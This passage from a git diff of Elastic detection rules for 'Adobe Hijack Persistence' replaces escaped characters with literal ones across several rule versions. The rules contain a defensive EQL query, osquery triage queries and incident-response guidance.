Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_107.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_107.json index 8052cfcecf6..7145a2353b0 100644 --- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_107.json +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_107.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_108.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_108.json index 92763536950..e20d4551ee3 100644 --- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_108.json +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_108.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).", "query": "file where host.os.type == \"windows\" and event.type == \"creation\" and\n file.path : (\"?:\\\\Program Files (x86)\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\",\n \"?:\\\\Program Files\\\\Adobe\\\\Acrobat Reader DC\\\\Reader\\\\AcroCEF\\\\RdrCEF.exe\") and\n not process.name : \"msiexec.exe\"\n", "references": [ "https://twitter.com/pabraeken/status/997997818362155008" @@ -53,7 +53,7 @@ ], "risk_score": 21, "rule_id": "2bf78aa2-9c56-48de-b139-f169bf99cf86", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "low", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_109.json b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_109.json index cf17e460f18..332746ab150 100644 --- a/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_109.json +++ b/packages/security_detection_engine/kibana/security_rule/2bf78aa2-9c56-48de-b139-f169bf99cf86_109.json @@ -14,7 +14,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Adobe Hijack Persistence", - "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the file using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n- Investigate potentially compromised accounts. Analysts can do this by searching for login events (for example, 4624) to the target host after the registry modification.\n\n### False positive analysis\n\n- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n", + "note": "## Triage and analysis\n\n### Investigating Adobe Hijack Persistence\n\nAttackers can replace the `RdrCEF.exe` executable with their own to maintain their access, which will be launched whenever Adobe Acrobat Reader is executed.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n#### Possible investigation steps\n\n- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n- Identify the user account that performed the action and whether it should perform this kind of action.\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Assess whether this behavior is prevalent in the environment by looking for similar occurrences across hosts.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - 